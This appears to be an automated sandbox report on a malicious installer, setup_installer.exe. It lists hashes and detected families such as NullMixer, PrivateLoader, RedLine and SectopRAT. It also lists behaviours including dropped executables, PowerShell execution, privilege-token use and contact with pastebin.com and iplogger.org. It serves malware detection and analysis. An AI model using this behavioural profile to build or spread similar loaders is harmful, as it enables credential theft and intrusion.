SHA1 0444bd892dadff101838309ab84bd85db5ddd88f
SHA256 1a36055d2fd545f69d849e15e81aca7497734e80da54be45782106bcf2e10400
SHA512 4f8ef9f4f18d4f1b3cf131c4c528ae0a370993f9eeb7dec0b91d7d379d4bcea2be5300802ddb0418b9e110ba86430d695e94651f9d66359894cbd90c26502cf1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 be6585ee90570bbc7498413f7a13a80e
SHA1 ee35d02aca7966a2a2fb2505a6447e22fc06528e
SHA256 3fc338eb10b1c031abc65fa76261b494dbdcf61e370fe3006f5ce1087343576d
SHA512 4f746626e5504eff9024d4e7b1f7b9e9e6c94d4edb93a755525375e5b4d5d470da52823be49bc02616722eb45c1c8828c69477a0231559d7b88bc64e5be40103

memory/4296-413-0x0000000003880000-0x0000000003912000-memory.dmp

memory/4296-414-0x0000000003920000-0x000000000451B000-memory.dmp

memory/4296-415-0x0000000004520000-0x00000000045AB000-memory.dmp

memory/4296-416-0x00000000045B0000-0x0000000004637000-memory.dmp

memory/4296-419-0x00000000045B0000-0x0000000004637000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\77fa9b46-2438-4487-9265-e1f2cedef883.tmp

MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

memory/4296-430-0x0000000000F10000-0x0000000000F14000-memory.dmp

memory/4296-429-0x0000000000F00000-0x0000000000F01000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 c20c4bfaa7e41cea5f6ede46fd72cffc
SHA1 fd792cc18b1188e02dbb7d29ef76c60aeede49a3
SHA256 98e8dd658b510fb3ad7e5b30f750b77f77bd81e334d5a8f2210d2159e34c07f0
SHA512 e78371a34b308acb4ca563183f0fac8fa5ee6a7f2df30523569126f46084af4da8ff1e31ad439f55ff58b98a9627bb95727c91d2bd16a74d96ea0efb016bd3b2

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240729-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
